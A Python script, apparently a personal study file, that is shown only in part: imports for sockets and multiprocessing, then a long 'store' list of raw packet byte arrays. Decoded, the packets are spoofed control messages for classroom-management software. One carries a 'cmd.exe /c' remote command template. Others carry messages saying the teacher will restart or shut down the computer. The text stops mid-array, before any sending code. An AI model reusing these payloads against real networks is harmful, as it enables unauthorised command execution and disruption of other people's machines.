| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
81cab2fc806660bae05fb98334355388a7b6b886
| 25,562
|
py
|
Python
|
dsaa/test.py
|
ntdgy/python_study
|
c3511846a89ea72418937de4cc3edf1595a46ec5
|
[
"MIT"
] | null | null | null |
dsaa/test.py
|
ntdgy/python_study
|
c3511846a89ea72418937de4cc3edf1595a46ec5
|
[
"MIT"
] | null | null | null |
dsaa/test.py
|
ntdgy/python_study
|
c3511846a89ea72418937de4cc3edf1595a46ec5
|
[
"MIT"
] | null | null | null |
import sys
import socket
import random
import argparse
from re import compile
from time import sleep
from struct import pack
from os import popen, system
from multiprocessing import Pool
store = [
[0x44, 0x4d, 0x4f, 0x43, 0x00, 0x00, 0x01, 0x00, 0x9e, 0x03, 0x00, 0x00, 0x10, 0x41, 0xaf, 0xfb, 0xa0, 0xe7, 0x52,
0x40, 0x91,
0xdc, 0x27, 0xa3, 0xb6, 0xf9, 0x29, 0x2e, 0x20, 0x4e, 0x00, 0x00, 0xc0, 0xa8, 0x50, 0x81, 0x91, 0x03, 0x00, 0x00,
0x91, 0x03, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00],
[0x44, 0x4d, 0x4f, 0x43, 0x00, 0x00, 0x01, 0x00, 0x6e, 0x03, 0x00, 0x00, 0x5b, 0x68, 0x2b, 0x25, 0x6f, 0x61, 0x64,
0x4d, 0xa7, 0x92, 0xf0, 0x47, 0x00, 0xc5, 0xa4, 0x0e, 0x20, 0x4e, 0x00, 0x00, 0xc0, 0xa8, 0x64, 0x86, 0x61, 0x03,
0x00, 0x00, 0x61, 0x03, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00,
0x77, 0x00, 0x73, 0x00, 0x5c, 0x00, 0x73, 0x00, 0x79, 0x00, 0x73, 0x00, 0x74, 0x00, 0x65, 0x00, 0x6d, 0x00, 0x33,
0x00, 0x32, 0x00, 0x5c, 0x00, 0x63, 0x00, 0x6d, 0x00, 0x64, 0x00, 0x2e, 0x00, 0x65, 0x00, 0x78, 0x00, 0x65, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x2f, 0x00, 0x63, 0x00, 0x20, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00],
[0x44, 0x4d, 0x4f, 0x43, 0x00, 0x00, 0x01, 0x00, 0x2a, 0x02, 0x00, 0x00, 0xbf, 0x40, 0x22, 0x4e, 0x57, 0x2d, 0x3e,
0x4f, 0x9b, 0x6f, 0xc1, 0x8d, 0xe1, 0xeb, 0x4f, 0x62, 0x20, 0x4e, 0x00, 0x00, 0xc0, 0xa8, 0x50, 0x81, 0x1d, 0x02,
0x00, 0x00, 0x1d, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x10, 0x0f,
0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x59, 0x65, 0x08, 0x5e, 0x06, 0x5c, 0xcd, 0x91,
0x2f, 0x54, 0xa8, 0x60, 0x84, 0x76, 0xa1, 0x8b, 0x97, 0x7b, 0x3a, 0x67, 0x02, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00],
[0x44, 0x4d, 0x4f, 0x43, 0x00, 0x00, 0x01, 0x00, 0x2a, 0x02, 0x00, 0x00, 0xc8, 0xe3, 0x97, 0xfd, 0xc0, 0xb5, 0x9f,
0x45, 0x87, 0x72, 0x05, 0xbd, 0x4e, 0x46, 0xa8, 0x96, 0x20, 0x4e, 0x00, 0x00, 0xc0, 0xa8, 0x50, 0x81, 0x1d, 0x02,
0x00, 0x00, 0x1d, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x10, 0x0f,
0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x59, 0x65, 0x08, 0x5e, 0x06, 0x5c, 0x73, 0x51,
0xed, 0x95, 0xa8, 0x60, 0x84, 0x76, 0xa1, 0x8b, 0x97, 0x7b, 0x3a, 0x67, 0x02, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
